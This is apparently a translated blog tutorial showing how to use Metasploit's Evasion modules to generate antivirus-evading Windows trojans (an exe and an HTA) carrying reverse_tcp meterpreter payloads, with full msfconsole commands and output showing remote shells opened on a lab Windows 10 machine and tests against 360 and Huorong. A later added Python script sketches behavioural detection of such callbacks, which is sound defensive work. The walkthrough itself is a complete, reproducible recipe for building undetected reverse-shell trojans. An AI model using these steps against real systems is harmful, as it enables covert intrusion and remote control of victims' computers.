AV evasion with the MSF Evasion module

In January 2019 Metasploit was upgraded to 5.0 and introduced a new module type called Evasion, which is said to be able to create trojans that get past antivirus software.

Enter MSF and list the modules available under that type.

msf6 > show evasion

evasion
=======

   #  Name                                         Disclosure Date  Rank    Check  Description
   -  ----                                         ---------------  ----    -----  -----------
   0  windows/applocker_evasion_install_util                        normal  No     Applocker Evasion - .NET Framework Installation Utility
   1  windows/applocker_evasion_msbuild                             normal  No     Applocker Evasion - MSBuild
   2  windows/applocker_evasion_presentationhost                    normal  No     Applocker Evasion - Windows Presentation Foundation Host
   3  windows/applocker_evasion_regasm_regsvcs                      normal  No     Applocker Evasion - Microsoft .NET Assembly Registration Utility
   4  windows/applocker_evasion_workflow_compiler                   normal  No     Applocker Evasion - Microsoft Workflow Compiler
   5  windows/windows_defender_exe                                  normal  No     Microsoft Windows Defender Evasive Executable
   6  windows/windows_defender_js_hta                               normal  No     Microsoft Windows Defender Evasive JS.Net and HTA

Generating the exe

Select module 5, windows/windows_defender_exe, and use it to generate the payload.

msf6 > use windows/windows_defender_exe  # select the module
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > set payload windows/meterpreter/reverse_tcp # set the payload to a reverse connection
payload => windows/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_exe) > set filename zfmy.exe # name the generated trojan zfmy.exe
filename => zfmy.exe
msf6 evasion(windows/windows_defender_exe) > set lport 4444 # listening port 4444
lport => 4444
msf6 evasion(windows/windows_defender_exe) > set lhost 192.168.15.137 # the IP that receives the shell is the local IP
lhost => 192.168.15.137
msf6 evasion(windows/windows_defender_exe) > run # execute

[*] Compiled executable size: 3584
[+] zfmy.exe stored at /home/kail/.msf4/local/zfmy.exe # the generated trojan is stored at this path
msf6 evasion(windows/windows_defender_exe) > 

Copy the trojan to the target Windows 10 machine.

Start the listener; the trojan works.

msf6 evasion(windows/windows_defender_exe) > handler -H 192.168.15.137 -P 4444 -p windows/meterpreter/reverse_tcp
[*] Payload handler running as background job 0.
msf6 evasion(windows/windows_defender_exe) > 
[*] Started reverse TCP handler on 192.168.15.137:4444 
[*] Sending stage (175174 bytes) to 192.168.15.183
[*] Meterpreter session 1 opened (192.168.15.137:4444 -> 192.168.15.183:63456) at 2022-01-05 13:34:51 +0800
[*] Sending stage (175174 bytes) to 192.168.15.183
[*] Meterpreter session 2 opened (192.168.15.137:4444 -> 192.168.15.183:63596) at 2022-01-05 13:35:07 +0800

We get a shell.


Switch to Windows 10 and check what 360 and Huorong make of it: both detect it easily.


Use the other module, windows/windows_defender_js_hta.

msf6 > use windows/windows_defender_js_hta
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_js_hta) > set filename zfmy1.hta
filename => zfmy1.hta
msf6 evasion(windows/windows_defender_js_hta) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/windows_defender_js_hta) > set lport 4444
lport => 4444
msf6 evasion(windows/windows_defender_js_hta) > set lhost 192.168.15.137
lhost => 192.168.15.137
msf6 evasion(windows/windows_defender_js_hta) > run

[+] zfmy1.hta stored at /home/kail/.msf4/local/zfmy1.hta
msf6 evasion(windows/windows_defender_js_hta) > 

The trojan works.

msf6 evasion(windows/windows_defender_js_hta) > run

[+] zfmy1.hta stored at /home/kail/.msf4/local/zfmy1.hta
msf6 evasion(windows/windows_defender_js_hta) > [*] 192.168.15.183 - Meterpreter session 2 closed.  Reason: Died

msf6 evasion(windows/windows_defender_js_hta) > 
msf6 evasion(windows/windows_defender_js_hta) > handler -H 192.168.15.137 -P 4444 -p windows/meterpreter/reverse_tcp
[*] Payload handler running as background job 1.
msf6 evasion(windows/windows_defender_js_hta) > 
[-] Handler failed to bind to 192.168.15.137:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Sending stage (175174 bytes) to 192.168.15.183
[*] Meterpreter session 3 opened (192.168.15.137:4444 -> 192.168.15.183:64230) at 2022-01-05 13:52:05 +0800
[*] 192.168.15.183 - Meterpreter session 3 closed.  Reason: Died

The bind errors above come from the handler started in the previous section (job 0), which is still listening on 4444; the HTA's callback is picked up by that existing handler, which is why session 3 still opens even though job 1 failed.

Neither 360 nor Huorong flags the file.

But when it is clicked to run, 360 flags it.
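Both walkthroughs above end the same way from the victim's side: a process (the generated exe, or mshta.exe hosting the HTA) opens an outbound TCP connection to lhost:4444 and immediately receives a 175174-byte stage. The following script is an added example, not part of the original post or of Metasploit: a small detection-side triage pass over constructed endpoint network events modelled on those two sessions. The log line format, the process names, the port list and the size threshold are assumptions.

```python
# Added example (not from the original post): detection-side triage over
# constructed endpoint network events, modelled on the two reverse_tcp
# sessions in the walkthrough. Log format, process names and thresholds
# are assumptions.
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ConnEvent:
    ts: str        # timestamp as logged
    image: str     # process that opened the outbound connection
    dst_ip: str
    dst_port: int
    bytes_in: int  # bytes received in the first seconds after connect


# Windows hosts the listed evasion modules rely on (an HTA runs under mshta.exe;
# the AppLocker modules use InstallUtil, MSBuild, PresentationHost,
# RegAsm/RegSvcs and the workflow compiler). Lower-case, assumed names.
LOLBIN_HOSTS = {
    "mshta.exe", "wscript.exe", "cscript.exe", "installutil.exe", "msbuild.exe",
    "presentationhost.exe", "regasm.exe", "regsvcs.exe",
    "microsoft.workflow.compiler.exe",
}
WEB_PORTS = {80, 443, 8080}      # ports where large downloads are routine
MSF_DEFAULT_LPORT = 4444         # the lport used throughout the post
STAGE_THRESHOLD = 100_000        # a meterpreter stage in the post is 175174 bytes


def parse_line(line: str) -> ConnEvent:
    """Parse one constructed log line of the form
    '2022-01-05 13:34:50 image=zfmy.exe dst=192.168.15.137:4444 bytes_in=175174'."""
    date, time, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    ip, port = kv["dst"].rsplit(":", 1)
    return ConnEvent(f"{date} {time}", kv["image"], ip, int(port), int(kv["bytes_in"]))


def analyse(ev: ConnEvent) -> List[str]:
    """Return the findings for one event (empty list if nothing fired)."""
    image = ev.image.lower()
    non_web = ev.dst_port not in WEB_PORTS
    findings = []
    if image in LOLBIN_HOSTS and non_web:
        findings.append(f"LOLBin {image} opened TCP to {ev.dst_ip}:{ev.dst_port}")
    if ev.dst_port == MSF_DEFAULT_LPORT:
        findings.append(f"{image} connected to Metasploit default port {MSF_DEFAULT_LPORT}")
    if non_web and ev.bytes_in >= STAGE_THRESHOLD:
        findings.append(f"{image} pulled {ev.bytes_in} bytes right after connect (possible staged payload)")
    return findings


def scan(lines: List[str]) -> Dict[str, List[str]]:
    """Map 'ts image' -> findings for every event that triggers at least one rule."""
    report: Dict[str, List[str]] = {}
    for line in lines:
        ev = parse_line(line)
        hits = analyse(ev)
        if hits:
            report[f"{ev.ts} {ev.image}"] = hits
    return report


# Constructed sample: the exe session and the HTA session from the post,
# plus two benign connections that must not fire.
SAMPLE_LOG = [
    "2022-01-05 13:34:50 image=zfmy.exe dst=192.168.15.137:4444 bytes_in=175174",
    "2022-01-05 13:40:12 image=chrome.exe dst=203.0.113.10:443 bytes_in=48211",
    "2022-01-05 13:41:03 image=outlook.exe dst=10.0.0.5:443 bytes_in=300000",
    "2022-01-05 13:52:04 image=mshta.exe dst=192.168.15.137:4444 bytes_in=175174",
]

if __name__ == "__main__":
    for key, hits in scan(SAMPLE_LOG).items():
        print(key)
        for h in hits:
            print("   ", h)
```

The three rules are deliberately behavioural rather than signature-based, which is the point the walkthrough illustrates: 360 and Huorong did not flag the HTA on disk but did flag it at run time. The weakest rule is the port match, since any lport can be chosen; the script-host and stage-size rules survive a changed port, and in a real deployment both would be joined to process-creation and parent-process telemetry.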


The other modules need external tools to compile and are skipped in this section.
